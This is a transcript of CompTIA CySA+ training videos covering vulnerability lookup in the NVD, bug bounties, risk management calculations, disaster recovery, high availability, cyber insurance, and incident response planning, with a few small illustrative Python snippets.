A few Vuln ID links are listed in the table. The application displays the CVSS severity levels for V3.1 and V2
for each of the Vuln ID links. [Video description ends]
So it talks about the nature of the issue and when it was published. And we can click the CVE link on the left
to get more details about the problem. [Video description begins] After pointing to the entries in the CVSS
Severity column and the Summary column, when he clicks the associated Vuln ID link, the corresponding page
that opens includes a table with the following columns: Hyperlink and Resource. A single hyperlink is listed in
the table. The web page also includes a "Known Affected Software Configurations" section. Each of the
configurations in the section has a Show Matching CPE(s) drop-down list. [Video description ends]
And then down below, we can see, for example, that there is a link here with a patch. So one of the resources
here to address this security issue is a patch that can be applied. And down below, we can see Known Affected
Software Configurations. So we can see the listing here for the version of Windows such as Windows 10. We
can even look at any other related vulnerabilities for that particular software version. So as you can see, the
National Vulnerability Database is a great way to look for any vulnerabilities that you think might be an issue
in your environment by using the Common Vulnerability Scoring System, or CVSS, to prioritize those threats.
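The same kind of search can be scripted. Here's a minimal sketch assuming the publicly documented NVD REST API version 2.0 and the requests package; the endpoint and field names should be verified against the current NVD schema:

import requests

url = "https://services.nvd.nist.gov/rest/json/cves/2.0"
params = {"keywordSearch": "remote desktop protocol", "resultsPerPage": 5}

response = requests.get(url, params=params, timeout=30)
response.raise_for_status()

# Print each CVE ID with its CVSS v3.1 base score, if one has been assigned.
for item in response.json().get("vulnerabilities", []):
    cve = item["cve"]
    metrics = cve.get("metrics", {}).get("cvssMetricV31", [])
    score = metrics[0]["cvssData"]["baseScore"] if metrics else "n/a"
    print(cve["id"], score)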
[Video description begins] Topic title: Bug Bounties. Your host for this session is Dan Lachance. [Video
description ends]
If you're a skilled computer programmer and IT security specialist, you could make money through bug bounty
programs. But that's not what it's really about. From the perspective of the company paying a bug bounty, it
allows them to tighten up the security of their product or service when ethical hackers discover and report
vulnerabilities.
Here in my web browser, I'm going to use a search engine to search for, let's say, bug bounty – just by itself.
And immediately, we can see we've got a lot of returned hits. For example, how much do bug bounty hunters
make? And it talks about what they could earn annually from bug bounties. However, as we scroll further
down, we can also see there are open-source bug bounty programs where you can search for specific bug
bounty types. So we can look at specific products and services available from very big name companies or you
could simply search them out.
So for example, let's say, we search out bug bounty department of defense. Let's see what we get here. Okay,
looks like we've got Department of Defense Expands 'Hack the Pentagon.... Now remember, this is in the
interest of the government agency or the company to tighten down their product, service, or website. And there
are a lot of details about this. Not all bug bounty programs will pay a reward.
Let's just go back out here. And maybe we'll search for bug bounty, let's say, a company like Grammarly. And
let's click on the Grammarly - Bug Bounty Program description, where we're going to see, for example, how
many reports were resolved. And we can see the average bounty here is between $150 and $200. Presumably,
that's in American currency. And we can see that for critical flaws, the payment could be all the way up to
$10,000.
However, there are rules of engagement for both parties as we scroll down. Rules for us – in this case for
Grammarly – and then Rules for you. That would be the ethical hacker and what you're testing and how you're
looking for vulnerabilities. We have a lot more details about the rewards and how they will be paid if it's a
previously unknown vulnerability that you, the ethical hacker, might have discovered.
So it's just something to be aware of – the fact that bug bounties exist for some of the largest companies on the
planet. And they're not to be looked at with a suspicious eye; rather, these companies should be applauded since
they are taking active steps to close security problems in their products and services.
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined security threats, including how IT security technicians can stay up-to-date
with the latest threats. We did this by exploring security intelligence sources and the use of the MITRE
ATT&CK knowledge base. We talked about threat intelligence collection and threat classification for
prioritization of threats.
We looked at different sources and motivation for IT threats. And we talked about the dark net, otherwise also
called the dark web. Then we looked at how to install and use the Tor web browser to access dark net
resources. We looked at threat positives and negatives, threat indicator management, and threat modeling.
And we talked about the Common Vulnerability Scoring System, or CVSS, and its security levels.
And finally, we talked about commonalities shared amongst bug bounties. In our next course, we'll focus on
business continuity where we explore policies, procedures, and controls to help in planning secure IT systems
and data as well as incident response reviews to improve future incident handling.
Table of Contents
Objectives
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have included
networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting across a
wide array of Microsoft products. The (CS0-002) CompTIA Cybersecurity Analyst, or CySA+ certification
exam, is designed for IT professionals looking to gain security analyst skills to perform data analysis to
identify vulnerabilities, threats, and risks to an organization, to configure and use threat detection tools, and
secure and protect an organization's applications and systems. In this course, we're going to explore risk
identification and prioritization that will aid in the planning of secure IT systems and data and to reduce the
impact of business disruptions.
I'll start by examining structured risk management frameworks, then talk about the importance of a risk register
and various risk treatments. I'll then explore disaster recovery strategies, solutions that provide high availability,
and cybersecurity insurance as a form of risk transference. Next, I'll examine the characteristics of a business
continuity plan and business impact analysis, otherwise called a BIA, and talk about how to proactively design an
incident response plan and post-incident activities. I'll then demonstrate how to enable Microsoft Azure storage
account replication, how to register a Windows Server with Azure for backup, and how backups provide
availability through recovery. Lastly, I'll explore how to create a MySQL database read replica in a secondary
geographical region.
Upon completion of this video, you will be able to recall how structured risk management frameworks work.
Objectives
[Video description begins] Topic title: Risk Management. Your host for this session is Dan Lachance. [Video
description ends]
Cyber security is all about proper risk management. And there are plenty of other activities that are related to
this such as penetration testing, which is used to prove that risks are real and can have a negative impact on an
organization.
NIST Special Publications 800-37 and 800-53 deal with risk management and security controls, which are used
to mitigate threats – how effective they are, how they should be configured, and how they should be replaced over time,
because as we know, continuous monitoring will eventually shed light on the fact that security controls that
once secured an asset properly may no longer be as effective. ISO/IEC 31000:2009 deals with risk
management. Now, this risk management framework can be used for any size or type of organization, whether it
be for-profit, non-profit, or a government agency. The idea is to balance activities within the
organization that serve business objectives and risk treatments. Now risk treatments would include things like
risk acceptance and risk transfer. An example of risk transfer might be the acquisition of cyber security
liability insurance.
So, with assets and risks, we have to first identify the assets, assign values to them, and then determine who the
custodians of those assets are. A data custodian, for example, would be the individual or the team that's
responsible for securing the storage of data in alignment with business rules. The next thing to do is to identify
risks to those assets and then look at the security controls.
So, therefore, the IT asset lifecycle begins with planning and procurement, that means looking at the assets that
are in place and then deploying security solutions, then operating and supporting solutions including applying
updates. Now the updates could be a part of hardening at the firmware or at the software levels. And then we
have the eventual decommissioning of the IT asset. So, an IT asset could be data, or it could be a specific IT
system that results in data that has value to the organization. Now when you're looking at applying security
countermeasures against risks, you have to think about the cost factor.
So, there are a number of asset risk calculations that we need to consider. Now first of all, let's talk about
terminology. The exposure factor or EF is the percentage of an asset that might be affected by a single negative
event, where the single-loss expectancy or the SLE, the S-L-E, is the cost associated with a single negative
event, so the entire cost. Then we've got the annual rate of occurrence, the ARO, A-R-O. So, how many times
per calendar year can we expect a negative incident to occur? And finally, we have the annualized loss
expectancy or the ALE. This is calculated by multiplying the annual rate of occurrence by the single-loss
expectancy. Now why would we care about this? We care about the ALE because this gives a cost. It lets us
quantify how much money we should be willing to spend to secure an asset on an annual basis compared to the
expected potential loss. So, we have to remember that when we're looking at things like let's say a server, an e-
commerce server, it's not really the server itself that's valuable, but rather, the data that it processes or perhaps
even stores, if that e-commerce data is stored on that host. So, let's do a calculation example.
[Video description begins] Asset Risk Calculation Example. [Video description ends]
Let's say we've got a database that's been valued by the organization at $500,000. And let's say that database
security breach wise, we can expect that we could have maybe a 5% data value loss when a single incident
occurs. Now we might derive this from past historical logged incidents. So, in this case, we would have an
exposure factor or an EF of 0.05. So, that's the 5%. Next, we can calculate the single-loss expectancy. That's
the asset value, the AV, in this case $500,000 multiplied by the exposure factor, so 5%, which results in
$25,000 single-loss expectancy. Now let's say that, based on past historical logged incidents, we can expect a
security breach once every two years. So the annual rate of occurrence, or the ARO, is 0.5 – if it occurred once a
year, it would be 1, but here it's 0.5. Now we can do some calculations. So, the annualized loss expectancy or the ALE
equals the ARO times the SLE. So, that would be 0.5 in this case, times 25,000. Now, when we take a look at
the result, we get $12,500. What does that mean? It means, on an annual basis, we should never exceed
$12,500 in security mitigations to protect our database asset that's been valued at $500,000.
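Here's the same calculation as a small Python sketch, using the figures from this example:

asset_value = 500_000              # database valued at $500,000
exposure_factor = 0.05             # 5% of the asset's value lost per incident
annual_rate_of_occurrence = 0.5    # one breach expected every two years

single_loss_expectancy = asset_value * exposure_factor                            # $25,000
annualized_loss_expectancy = annual_rate_of_occurrence * single_loss_expectancy   # $12,500

print(f"SLE: ${single_loss_expectancy:,.0f}")
print(f"ALE: ${annualized_loss_expectancy:,.0f}")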
After completing this video, you will be able to understand the importance of a risk register.
Objectives
[Video description begins] Topic title: Risk Register. Your host for this session is Dan Lachance. [Video
description ends]
There is no such thing as an organization that is not exposed to some level of risk. And this is true regardless of
industry, and regardless of whether it's a government agency or private sector, for-profit or nonprofit – it doesn't matter.
So, risk management means taking a look at the enterprise risk, which could be broken down into many
different categories, such as strategic risk, environmental risk, market risk, credit risk on the finance side,
operational risk, and compliance risk, when it comes to complying with security frameworks or standards or
regulations, which will vary in different parts of the world, depending on the type of asset you're talking about,
such as sensitive data. All of these different categories of risk are supported by some kind of an IT ecosystem.
Servers, storage arrays, routers, network equipment, and, of course, the actual data that's being stored and
perhaps replicated, even across national boundaries. So, all of this ends up being IT-related risk in the modern
world. And that's why it's so important to have a proper IT governance risk management framework in place.
Now, part of doing that involves having a risk register.
In this video, you will learn how to apply various risk treatments to risks.
Objectives
[Video description begins] Topic title: Risk Treatments. Your host for this session is Dan Lachance. [Video
description ends]
When organizations undertake new endeavors, whether it's partnering with another business for a government
contract or whether it's beginning the migration of on-premises services to the cloud, whatever it happens to
be, there is risk involved.
And an important part of working with risk and managing it properly in an organization is determining the
organizational risk appetite. What kind of impacts is the organization ready to accept should a risk materialize?
And so, part of this is also going to be related to defining a risk owner who is responsible if threats or risks
materialize and have a negative impact on the business. So, there are a number of risk treatments then that can
be applied, depending on the nature of the risk that's involved and the organization's risk appetite. The first is
risk acceptance. We also have risk avoidance. With risk acceptance, which is also called risk retention, it
means that the risk is known to the organization and loss, should it occur, is acceptable. This also means that
we have to think about risk avoidance, because what if the loss is unacceptable? What if it's so risky that even
the gains aren't worth it? Well, then, that would be risk avoidance. Here, risk is not even transferred to another
party; the organization simply does not engage in the activity or the project because the risk is
unacceptable. So, you've got risk acceptance versus risk avoidance. Now, risk acceptance happens all of the
time. For example, if you're an investor and you invest in the stock market, the risk you're taking is that
companies that you buy stock in could simply declare bankruptcy, which means your investment vaporizes.
But the financial gains might be worth it, hence risk acceptance.
There are other risk treatments, like risk reduction and risk transfer. Risk reduction is a big focus of risk
management frameworks because we're talking about putting things in place to reduce or lessen risk frequency
and the impact it has on the organization. So, in other words, risk mitigation. This means implementing a risk
management framework and continuously monitoring security controls put in place to manage the risk,
because they might need to be changed over time. Risk transfer is also called risk sharing. And this is a risk
treatment option that might be applicable when risk mitigation isn't feasible. So, this means outsourcing.
Examples of this, imagine that we want to outsource some of our on-premises data storage or IT systems out to
the Cloud, or we want to hire subcontractors to do some kind of IT work, or we decide to purchase
cybersecurity insurance for protection should a data breach, for example, occur. Not only to replace missing
data, but also to deal with third-party litigation against the organization as a result of things like data breaches.
So, despite all of these risk treatments that an organization might consider and manage, there will always be
some kind of a residual risk still remaining.
In this video, find out how to maintain business continuity during unexpected disruptions.
Objectives
[Video description begins] Topic title: Disaster Recovery Strategy. Your host for this session is Dan
Lachance. [Video description ends]
An important aspect of every organization's security posture is how it plans ahead of time proactively for
negative incidents that might occur, to reduce their impact.
This is all about disaster recovery, business continuity to make sure that business processes and the underlying
IT systems are kept running all the time, and that the data is available. So, high availability is an important
aspect of security.
Now there are a number of disaster recovery strategies and things to consider, like the recovery time objective
or the RTO. The recovery time objective is expressed in time, such as hours, and it represents the maximum
acceptable amount of downtime. For example, for an e-commerce server, maybe the RTO is four hours.
Beyond that, there are unacceptable consequences to the organization. And so our disaster recovery strategy
has to keep that in mind. In our example, the e-commerce server needs to be up and running within four hours.
The recovery point objective or RPO, is also expressed in time. But the RPO is more related to the maximum
tolerable amount of data loss. Again, if that were set at four hours, it would mean that we would have to make
sure that we are taking backups of that data that has an RPO of four hours at least once every four hours.
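As a small sketch with hypothetical timestamps, a script could compare the age of the last backup against the RPO to flag when a backup is overdue:

from datetime import datetime, timedelta, timezone

rpo = timedelta(hours=4)  # maximum tolerable data loss
last_backup = datetime(2020, 1, 15, 3, 0, tzinfo=timezone.utc)   # hypothetical last backup time
now = datetime(2020, 1, 15, 9, 30, tzinfo=timezone.utc)          # hypothetical current time

if now - last_backup > rpo:
    print("RPO exceeded - a backup is overdue")
else:
    print("Within RPO")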
Service level agreements or SLAs are contractual documents between a provider of a service and a consumer
of a service. Whether it's within an organization or maybe with a public cloud provider, it guarantees uptime.
And that's an important part of a disaster recovery strategy for an organization to look at the SLA for various
services that it depends on. And then there’s clustering and load balancing.
The idea with clustering and load balancing is to have more than one backend server supporting an application.
Now more often than not, those servers will be in the form of virtual machines that might run on-premises in a
data center or in a public cloud provider environment. Now on the load balancing side, we have one entry point
essentially to the application, that would be the load balancer. It takes client requests in and it determines
which backend server that request would be routed to. That way we get the performance benefit, as well as
high availability because if one back-end virtual machine goes down, there are others that can pick up the slack
because they are also supporting the same application. So, what else can we do in terms of disaster recovery to
ensure availability of IT systems and data? Well, these days what's happening more and more is organizations
are looking at using public cloud provider infrastructure as an alternate disaster recovery site, or DR site. This
is often referred to as Disaster Recovery as a Service, or DRaaS. Now that could involve doing things like
replicating on-site systems and data into the cloud. So, if something happens to your on-premises environment,
you've got it stored elsewhere.
The great thing about the public cloud, is you're essentially renting it, you're paying for what you're using.
There's no upfront capital investment as there would be if you were to invest in your own custom disaster
recovery alternative site. It's also scalable due to all of the resources available in the cloud, so if you need more
and more storage, it will be available. Then we've got data replication to alternate regions. So, you might take,
for example, a database and create a replica, store it in another physical region. So, if there's some kind of a
disruption in the primary region, you've already got an up-to-date copy of the data elsewhere. Not only is it
important to ensure that we back up data, but also the configuration of complex IT systems. The idea is to
make sure that we adhere to the RTO or the recovery time objective to get failed systems up and running as
quickly as possible. Another aspect of disaster recovery would be offline backup storage. Now, why would we
want to do that? Well, in one word, ransomware.
Ransomware can infect a machine and encrypt all of the data it has rights to access. And
unless the ransom is paid, a decryption key is not provided. And there's never a guarantee it will be provided anyway, even
if payment is received. And so, having backups stored offline means that, in the event of a ransomware
infection, you still have a recent copy of data that has not been infected. Now there's still a cost associated with
this, in terms of restoring systems and data back to a functional state, but often it's better than paying a ransom.
Learn how to define which types of solutions provide high availability for IT systems and data.
Objectives
define which types of solutions provide IT system and data high availability
[Video description begins] Topic title: High Availability. Your host for this session is Dan Lachance. [Video
description ends]
Applications are at the core of IT systems, and their use results in important data. Whether it's an application used to
validate drivers' licenses online, to determine the tax owed by a corporation or an individual, or an e-commerce
website, these things are important. And so, it's important that we think about high availability
and load balancing for applications to ensure their continued uninterrupted processing. So, performance is
important.
[Video description begins] High Availability - Load Balancing [Video description ends]
High availability and load balancing in terms of performance means having multiple back-end virtual
machines serving the same app. It's highly available because if one of those virtual machines goes down, there
are others that are already up and running that can serve client requests. It's scalable in that if we have a peak
in demand for an application, and we've got a load-balanced solution, it can be configured for Auto-scaling,
especially in the cloud. So, that as things get busier, we can add virtual machine instances to support the app.
Now we can also configure scaling so that we remove virtual machine instances when things quiet down.
Scaling out means adding VMs, scaling in means removing them to save on costs. So, this is Auto-scaling.
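Cloud platforms implement this for you, but as a rough sketch with made-up thresholds, the auto-scaling decision boils down to something like this:

def scaling_decision(avg_cpu_percent, instance_count,
                     scale_out_at=75, scale_in_at=25,
                     min_instances=2, max_instances=10):
    # Scale out (add a VM instance) when average CPU is high,
    # scale in (remove one) when it is low, within the configured bounds.
    if avg_cpu_percent > scale_out_at and instance_count < max_instances:
        return instance_count + 1
    if avg_cpu_percent < scale_in_at and instance_count > min_instances:
        return instance_count - 1
    return instance_count

print(scaling_decision(avg_cpu_percent=82, instance_count=3))  # 4 - scale out
print(scaling_decision(avg_cpu_percent=12, instance_count=3))  # 2 - scale in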
Pictured on the screen we have an example of a load-balanced environment, where a client device would
connect to a URL pictured here as www.quick24x7.com. Now that needs to resolve to an IP address and it
would resolve to the load balancer's IP address. Here we're calling it the load balancer public IP address. So,
presumably we've got a public load balancer that's available to the outside. You can also have internal load
balancers for internal applications used by employees. So, at this point, the request will be routed to the most
responsive and healthy back-end virtual machine.
When you configure a load-balanced solution, you determine whether it's public or private as we've mentioned.
You can also determine if it's just an HTTP type of application, or HTTPS, if it's been secured with a PKI
certificate. Now we're not saying it has to be an HTTP based application because it does not have to be, you
can load balance pretty much anything. So, you could base it on a TCP or a UDP port number. You can also
use TLS, which, of course, is an HTTPS connection to secure and encrypt network communications for a
network load balancer.
Now an application load balancer and a network load balancer are similar, but there is a difference. One being
that an application load balancer is usually based on the HTTP protocol. And it's a little bit different in that
where a network load balancer normally looks only at port numbers, an application load balancer can actually
look at a URL. An incoming URL for an app and make a back-end VM routing decision based on the URL.
So, if the URL includes streaming video, it might direct that request to a back-end group of servers that are
optimized for streaming video. Then there are Firewall ACL or access control list rules that can control what
traffic is allowed into and out of the load-balanced solution. The load balancer can also be configured with
back-end VM health checks. So, that perhaps every five minutes or every one minute, it'll probe a specific port
in each back-end VM. And if it doesn't get a response within a given threshold, it will flag it as being
unhealthy. And so client requests would then not be routed to those back-end VMs.
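A basic TCP health probe of the kind a load balancer performs can be sketched in a few lines of Python; the back-end addresses and port here are hypothetical:

import socket

def tcp_health_check(host, port, timeout=2.0):
    # Healthy if a TCP connection to the probed port succeeds within the timeout.
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

backends = ["10.0.1.4", "10.0.1.5", "10.0.1.6"]   # hypothetical back-end VM addresses
healthy = [ip for ip in backends if tcp_health_check(ip, 80)]
print("Client requests can be routed to:", healthy)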
[Video description begins] High Availability - Data. [Video description ends]
High availability also applies to data. This relates to the recovery point objective or the RPO. Remember that
the RPO denotes the maximum tolerable amount of data loss. So, maybe the organization cannot tolerate more
than four hours of data loss. So, we have to make sure our backups occur at least once every four hours. So,
this is related to backup, we could also replicate data to alternate locations for safekeeping. The RTO, or the
recovery time objective, remember, relates to the maximum amount of downtime. So, this relates to our
incident response plan to get things up and running as quickly as possible back to a functional state. It could
also include things like backup power generators in the event that we lose power because of a disruption on the
power grid, or having duplicate network connections to the public cloud if we have a dependency from
on-premises to public cloud provider services.
After completing this video, you will be able to describe how cybersecurity insurance is a form of risk transfer.
Objectives
[Video description begins] Topic title: Cybersecurity Insurance. Your host for this session is Dan
Lachance. [Video description ends]
What you're looking at on your screen is the search result for cyber insurance.
[Video description begins] A cyber insurance - Bing web page is open in the web browser. It is divided into
two parts. The first part includes a search bar and three tabs labeled "cyber insurance", "cyber liability", and
"cyber business interruption insurance". The second part is a content pane. The second part includes the
information about the search result for cyber insurance. [Video description ends]
And we can see there are variations here, such as cyber liability insurance, cyber business interruption
insurance. In this day and age, a lot of organizations might look to this. And really it's just a form of risk
transference to the insurance company when negative cyber security events occur. Whether it's a data breach or
a malware infection or a server being down for a long time, affecting customers. So, if we scroll down, let's say
I click on this link for Protect your organization from cyber crime.
[Video description begins] He clicks a link labeled "Protect your organization from cyber crime". The web
page labeled "IBC BAC" opens in the web browser. It is divided into two parts. The first part includes options
labeled "Auto", "Home", and "Business". The second part is the content pane. It is divided into several
sections. It includes sections labeled "Types of cyber attacks", "Six questions to consider when buying cyber
insurance", and "What can cyber insurance cover". [Video description ends]
An important part of looking at cyber security insurance is knowledge, looking at the details.
[Video description begins] He points to the "Types of cyber attacks" section. [Video description ends]
For example, so we go further down, the types of cyber attacks that might occur, Denial of service attacks,
Phishing attacks, Malware, Ransomware, Spoofing or impersonation, Brute force, where attackers might use a
password cracking program to keep trying to break into accounts that might be using weak passwords. Then, of
course, there are six questions, it says here, to consider when you buy cyber insurance.
[Video description begins] He points to the "Six questions to consider when buying cyber insurance"
section. [Video description ends]
So what kind of data do we have, like sensitive personal data? Do all portable media and computing devices
need to be encrypted? Down below, What can cyber insurance cover?
[Video description begins] He points to the "What can cyber insurance cover" section. [Video description
ends]
So, Legal and civil damages, Security breach remediation, so, the costs of getting things back up and running
after some kind of an attack, such as a ransomware infection. Even if you don't pay the ransom to potentially
receive a decryption key when ransomware occurs, often machines might need to be reimaged with an
operating system image. And then data restored from a backup prior to the ransomware infection, that takes
time and effort, it requires IT personnel. There's a cost associated with it. And so, even on the notification side
when a data breach or a security breach has occurred, cyber liability insurance can also deal with that.
[Video description begins] He highlights the subsection labeled "Security breach remediation and notification
expenses" in the "What can cyber insurance cover" section. [Video description ends]
The other thing to consider when you think about cybersecurity insurance is, if there is the possibility of a
reduction in premiums, if the organization can demonstrate that it is compliant with security standards or
frameworks or regulations.
After completing this video, you will be able to describe common characteristics of a business continuity plan,
a business impact analysis, and related insurance options.
Objectives
describe common characteristics of a business continuity plan, BIA, and related insurance options
[Video description begins] Topic title: Business Continuity and Business Impact Analysis. Your host for this
session is Dan Lachance. [Video description ends]
[Video description begins] Disaster Recovery Plan (DRP). [Video description ends]
The disaster recovery plan, or DRP, is a part of the overall business continuity plan, or BCP. The BCP, at a higher
level, is concerned with keeping business processes running. The disaster recovery plan is a little more specific on exactly how to recover a
failed system. Now, incident examples that might cause us to kick in the disaster recovery plan would be a
crashed e-commerce website, or a remote data center that's no longer reachable, or data corruption, or even
fire. Now, at this point, we have to distinguish the difference between a disaster recovery plan and an incident
recovery plan. Well, the real big difference is timing. The incident recovery plan is effective while the incident
is occurring. And, ideally, to contain and eradicate it. Whereas, the disaster recovery plan is really more after
the incident has occurred, how can we quickly restore operations or business processes?
So, disaster recovery planning includes thinking of things like the RTO and the RPO. The RTO is the recovery
time objective, it's the maximum tolerance for downtime. It allows us to have a model or a framework to work
in, within which, that time frame, we have to bring the systems back online or get data recovered quickly. It
also can include time to move operations to an alternate site. Now, these days, that's not so much a physical
task; alternate sites are often a duplicate of on-premises IT systems and data that we might have running in
the cloud that would kick in if there's a disruption or some kind of a disaster on-premises.
The recovery point objective, or RPO, is related to the maximum tolerance for data loss. So, this really deals
with how often backups should be taken. And what kind of assets we should focus on for backups, such as
finance servers versus file servers that simply contain replaceable documentation. The other aspect of disaster
recovery planning is looking at the reliability of hardware and software systems. For example, the mean time
to repair, or MTTR, and the mean time between failures, or MTBF, are important items to consider. The MTTR
deals with the average time it takes to restore something back to a functional state. So, it deals with things like
equipment reliability. And over time, the more mature a system, it doesn't have to be one piece of hardware,
could be an overall IT solution, but the more mature that solution, the less time that will be required for
restoration. The reason for this is because the more mature a system becomes, the more we've had time to deal
with incidents and to kind of hone the skills required to restore that item back to a functional state.
The MTBF is the average time between failures. From the MTBF and the MTTR we can express availability as a percentage,
calculated by taking the MTBF divided by the sum of the MTBF and the MTTR, multiplied by 100. Now, as an example, let's
plug in some numbers. Let's say that we are talking about a website and we're concerned about its reliability
because it's a revenue generating website for the organization. Let's say, based on past historical records, the
website comes down approximately once every 250 days. So, that works out to be 6000 hours, that's where the
6000 comes from here. And let's say that when that server does come down, approximately once every 250
days, it takes about four hours to get it up and running again. That's where the four comes from. So, when we
plug in those numbers into our formula, we are left with 99.93%. That expresses the availability of that web
server that is revenue generating. It's 99.93% available, that amount of the time.
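Here's that availability formula as a quick Python sketch, using the same numbers:

mtbf_hours = 250 * 24   # fails roughly once every 250 days = 6000 hours
mttr_hours = 4          # about four hours to restore it

availability = mtbf_hours / (mtbf_hours + mttr_hours) * 100
print(f"Availability: {availability:.2f}%")   # roughly 99.93%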
[Video description begins] Disaster Recovery Plan Document. [Video description ends]
The disaster recovery plan document is usually for a specific service or system. It will include the recovery
objective, the scope of what the disaster recovery plan covers, whether it's a specific revenue generating
website or whether we're talking about an entire site. Also the DRP team members and their responsibilities
will be documented in the DRP. There will also be contact information, such as if there's a problem and we
can't recover it, by following the DRP, who should we escalate this to? Contact information is crucial in the
disaster recovery plan. So, that deals with escalation details. All of this falls into security, because an important
aspect of security is the availability of systems and data.
During this video, you will learn how to design a plan that outlines the response to disruptions.
Objectives
[Video description begins] Topic title: Incident Response Plan. Your host for this session is Dan
Lachance. [Video description ends]
Incident handling is all about planning ahead of time for how to respond to and manage unplanned business
disruptions.
So, this is really about business continuity recovery time objectives, or RTOs, to get things up and running as
quickly as possible when there are disruptions. So, the incident response plan, or the IRP, then, is a document
or a set of documents that must be known by the appropriate parties to recover from a disruption quickly.
Now, the next thing we have to think about is the incident response lifecycle. At some point initially, the
incident response plan, or the IRP, needs to be created. Now because there should be a continuous monitoring
of security controls and, of course, continuous monitoring of incident history, that means we'll have to update
the incident response plan over time, especially as new threats emerge so we can learn from past incidents.
Now we need to identify and respond to security incidents in alignment with the created incident response
plan, the IRP. After which the problem can be eradicated and recovered. And then we can update the IRP once
again. Now, identifying and responding to incidents can also be automated. An example of this would be using
an intrusion prevention system, an IPS, that might be configured to look for security incidents, such as
offensive traffic from a specific network or host and blocking that IP address as required. Now, whenever you
update an incident response plan, you need to make sure that you document the nature of the update and when
it occurred. There needs to be a revision history at the beginning of the incident response plan.
[Video description begins] Incident Response Plan Components. [Video description ends]
Now, the components within the incident response plan would include things like the security operations
center, or SOC, team members and their responsibilities. You need to have people that take responsibility
for specific IRPs and know what their job role is when incidents occur. This way, issues can be resolved as
quickly as possible. The other thing is having a contact list. So, for example, the incident command system, or
ICS, is a standard way to coordinate how incidents are responded to, especially across multiple security
operations center teams. It's also important that there is a response checklist that is adhered to when an incident
occurs – and, in the case of an incident that might jeopardize the safety of personnel, assembly areas, such
as when fires break out. And there might also be legal disclosure requirements whereby we have to have a
contact list, perhaps for legal and public relations to disclose that an incident has occurred. This would be
something that would be very important with organizations that have data breaches related to customer
sensitive information. Now the incident response plan has to have a containment strategy component. What are
we going to do when an incident occurs? So, for example, if there's a malware outbreak, what's the response?
Maybe it's to isolate that device or network, or if an incident is that we've got a data security breach due to the
fact that there were missing patches that were not applied, then part of the containment is going to be to apply
those patches immediately. It's important to consider running periodic drills, so that team members know what
their role is and how it all fits together when responding to incidents.
[Video description begins] Incident Response Plan (IRP). [Video description ends]
The incident response plan needs to be in effect naturally before incidents occur, it should not be an
afterthought. What can be an afterthought is making updates from lessons learned when incidents occur. Now,
what about if we don't have an adequate incident response plan, or it's not updated periodically, or there are no
drills with team members? Well, some of the effects can be nasty. It can have a financial effect against the
organization, there can be reputation loss, it can result in the loss of business partnerships and so on. And so,
there needs to be at minimum an annual review of incident response plans to keep up with changing threats.
Find out how to benefit from lessons learned during incident response.
Objectives
[Video description begins] Topic title: Post Incident Activities. Your host for this session is Dan
Lachance. [Video description ends]
A cybersecurity analyst must be concerned with more than just using hacking tools, and firewall rules, and
patching operating systems, and so on. There's also making sure that we take steps proactively to eliminate or
at least reduce the impact of incidents. And that's where post-incident activities come in. So, what do we do
after a negative incident has occurred and the problem has been contained? Well, at this time, it's really about
reflection on how to make things better in the future by looking at lessons learned from the incident response.
Was it effective in containing the incident efficiently? And then, of course, looking at the root cause. How
did the incident occur in the first place? Because the overall purpose here is to either completely eliminate the
re-occurrence of the incident or reduce its impact in the future. We don't want these things happening again.
Now part of this is documentation.
[Video description begins] Post Incident Review Form Example. [Video description ends]
The organization needs to have a post-incident review form. Now here, we have an example where the
company name is at the top, Quick24x7. And we've got a confidentiality level that might be set, in this case,
let's say high. We have the date of the incident and a description of the incident. In this case, it's a user laptop
and the data and files on it being encrypted with the ransomware variant WannaCry. So, what was the cause of
this? We have to do some investigation to be able to properly populate this post-incident review form. The root
cause might be that the user opened an infected email message. The incident scope, what was affected? Might
be just the user laptop when they were connected to a public Wi-Fi network? Who are the incident response
technicians, and which remediation steps were taken to resolve the issue? And you might even include how
long it took for that to happen. This is absolutely valuable information because by having a historical record of
what was done when incidents occurred, we can always improve the process, to make it more efficient in terms
of timing and even in terms of cost effectiveness.
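If you wanted to capture that form in a structured, machine-readable way for incident summary reports, a simple sketch mirroring the fields from this example might look like this:

from dataclasses import dataclass, field
from typing import List

@dataclass
class PostIncidentReview:
    company: str
    confidentiality: str
    incident_date: str
    description: str
    root_cause: str
    scope: str
    responders: List[str] = field(default_factory=list)
    remediation_steps: List[str] = field(default_factory=list)

review = PostIncidentReview(
    company="Quick24x7",
    confidentiality="High",
    incident_date="2020-01-15",          # hypothetical date
    description="User laptop data encrypted by the WannaCry ransomware variant",
    root_cause="User opened an infected email message",
    scope="Single user laptop on a public Wi-Fi network",
    responders=["On-call security technician"],
    remediation_steps=["Isolate the laptop", "Reimage the operating system", "Restore data from backup"],
)
print(review)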
So, post-incident activities then can also include looking at indicators of compromise when incidents occurred.
So, maybe the indicator of compromise reflects the fact that we have a machine
that was infected with the ransomware. Depending on the nature of the incident, in our case, there was no real
crime committed. But if there is, then evidence retention in accordance with the chain of custody to properly
watch over and govern evidence would be applicable.
Post-incident activities include updating the incident response plan from lessons learned to improve it and
make it more efficient, which might also trigger a new round of training for security personnel to deal with that
type of incident. It can also mean updating organizational security policies to prevent things from
happening, such as having user training and awareness on a periodic basis so people are aware that they
shouldn't be clicking on suspicious file attachments in email messages. There also needs to be an incident
summary report. That's part of what the incident response form, the post-incident response form feeds into.
And as always, with security, there needs to be continuous monitoring of post-incident activities to ensure
they're effective, with a continuous desire to improve the incident response plan and make it more efficient.
[Video description begins] Topic title: Cloud Storage Replication. Your host for this session is Dan
Lachance. [Video description ends]
In this demonstration, I will be enabling Cloud Storage Replication. Specifically, I'll do it with the storage
account in the Microsoft Azure Cloud. So, to get started here, I've already got an account and I've signed in to
the Microsoft Azure portal, the GUI Management Tool.
[Video description begins] The Microsoft Azure portal is open. It is divided into two parts. The first part
includes a search bar. The second part is a content pane. It includes a section labeled "Azure services". It
further includes options labeled "Create a resource" and "Virtual machines". [Video description ends]
So, I'm going to click Create a resource, because I want to create a storage account.
[Video description begins] He clicks the "Create a resource" option and a page labeled "New" opens in the
content pane. It includes a search bar. [Video description ends]
